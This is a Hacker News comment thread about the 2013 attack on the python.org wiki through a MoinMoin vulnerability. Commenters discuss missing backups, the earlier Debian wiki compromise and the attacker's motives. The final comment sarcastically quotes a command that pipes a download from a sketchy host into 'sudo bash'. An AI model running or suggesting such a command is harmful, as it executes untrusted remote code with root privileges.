
Python.org Wiki has been Attacked - lispython
http://wiki.python.org/moin/WikiAttack2013/
======
lifeisstillgood
I know that we expect our volunteer Open Source Language leaders to be
exemplars of best practise and always on the ball, but there are never enough
volunteers or enough funds to pay for all the sysadmins you need.

But my first reaction here is "There, but for the grace of God, go I"

Embarrassing, yes. End of the world, no. Heads to roll? No, but arse to be
kicked, yes. Won't happen again, will it?

------
Tinned_Tuna
> our most recent backup dates back to June 24 2012

And therein lies the problem of disaster recovery. Even if you have a
catastrophic bug, you should not be losing 6 months of data.

~~~
yk
They state that the attack possibly occurred the next day, so it is possible
that the attacker did disable backups.

~~~
eksith
This is why write-only backups aren't just a good idea; like gravity, it's the
law. I know funding for these things is on a shoestring budget, but there
should have been an external service to ensure backups are being made on a
regular basis. Or else, you don't know something's wrong until something's
really, really wrong.

------
orangethirty
I might have some data gotten through crawling them with Nuuton. Anyone from
their team here? I'm going to check. Though not very positive, because I'm not
currently scraping every single page completely.

 _Bad news update:_

I had not covered the wiki yet. The crawler seems to have ventured off to SO
(the crawler runs 24/7 by itself). I'm so sorry. :(

~~~
eqreqeq
Not to sound rude but what are you talking about? Why are you even
apologizing?

~~~
lylejohnson
I think he's saying that he set up a web crawler to scrape python.org, and he
was hoping that in the process it had made copies of those Wiki pages. He's
apologizing that, as it turns out, the crawler did not make it to those pages
after all.

~~~
orangethirty
Exactly. I thought my crawler had covered all of python.org, but it strayed
off to Stack Overflow. Had not noticed due to the sheer amount of data it goes
through. On one side, this sucks because I cannot help put the wiki back
online. On the other, this led me to discover this bug.

~~~
dbecker
I'd expect they'll find a way to restore the wiki content. The bigger concern
is that someone downloaded their password file.

------
larelli
Couldn't someone at Google provide a dump of the wiki? Assuming that they have
it in their page cache they might be willing to help, given they seem to be
one of the largest organizations using Python.

~~~
dalke
From the article. "It turned out that the Google cache was unusable for the
task due to a surge protection on their site."

~~~
jzwinck
Right, but some of us thought that meant the Python folks couldn't use it
because Google's servers were limiting the rate of GET requests for the cached
pages. I.e. the data is inside Google but difficult to get out quickly
(without Google's specific help).

~~~
dalke
Ahh, yes. Your interpretation makes more sense than mine.

------
Skoofoo
What compels someone to destroy documentation for an open source project?

~~~
crusso
Alfred Pennyworth: Well, because he thought it was good sport. Because some
men aren't looking for anything logical, like money. They can't be bought,
bullied, reasoned, or negotiated with. Some men just want to watch the world
burn.

------
daGrevis
No backups since June 24, 2012?!

~~~
quink
Just as disturbing: "The attack used on the wiki was apparently the same as
the one which hit Debian" [on 2012-07-25]

The exploit was out there and had been used to hit debian.org in a big way,
and had been fixed. But python.org didn't update MoinMoin or check whether
their MoinMoin installation hadn't been compromised until their data got
deleted about half a year after the original exploit :|

~~~
jyap
No, not really.

Debian Timeline

2012-07-25: Debian's MoinMoin was exploited (due to what is eventually called
CVE-2012-6081).

2012-10-18: First use of the backdoor.

2012-10-28: Theft of email addresses, password hashes and reCAPTCHA key.

2012-11-09: Last use of the backdoor.

2012-12-28: We are informed about a potential security issue in MoinMoin by
the friendly people at dyne.org.

From: <http://wiki.debian.org/DebianWiki/SecurityIncident2012>

~~~
tonfa
And many other people have been affected (probably every decent-sized site
running MoinMoin): MoinMoin itself, Mercurial, also I think FreeDesktop. I
wonder if Ubuntu was too.

------
fixed_input
"We were subsequently approached by the person who ran the rm -r * " ... " It
is also obvious that the people who installed the plugin, had different
intentions than causing easy to detect damage on the system."

Seems like a case of a script kiddie who got the login information from
someone else...probably doesn't know his way around Linux too well and thought
it would be funny to run a few commands, then got scared once he realized what
he'd done and fessed up.

------
pekk
Given that this is the same attack of Jan 5, about which we have already seen
posts, and has not indicated a bug in anything except MoinMoin and PSF's
systems administration staff, I wonder why this is being posted again today,
with a headline which could easily be taken to suggest a fresh attack.

------
dbecker
When this happens on sites run by tech-savvy folks, it makes me wonder: How
frequently is this happening (and going undetected) on sites with less savvy
admins?

------
Buttons840
This reminds me of when divmod.org was attacked. The site has been "temporarily"
offline for years now. It's really sad because divmod had some quality Python
libraries which have never become popular because they have no documentation;
the documentation was destroyed when the site was attacked.

------
benedikt
> The VM was rebooted on Jan 7, apparently in an attempt to get things working
> again.

Who rebooted the VM? If it was the attackers, this implies that they had root.
But the post only states that they could execute code as the moin user.

------
biot
And the article links to the wiki... if it's been compromised, how should I
know it's now safe to visit?

------
jvehent
Oh Darn! So that wiki page saying that I should run
`curl http://sketchyhackers.cc/exploit | sudo bash` wasn't legit???

</sarcasm>

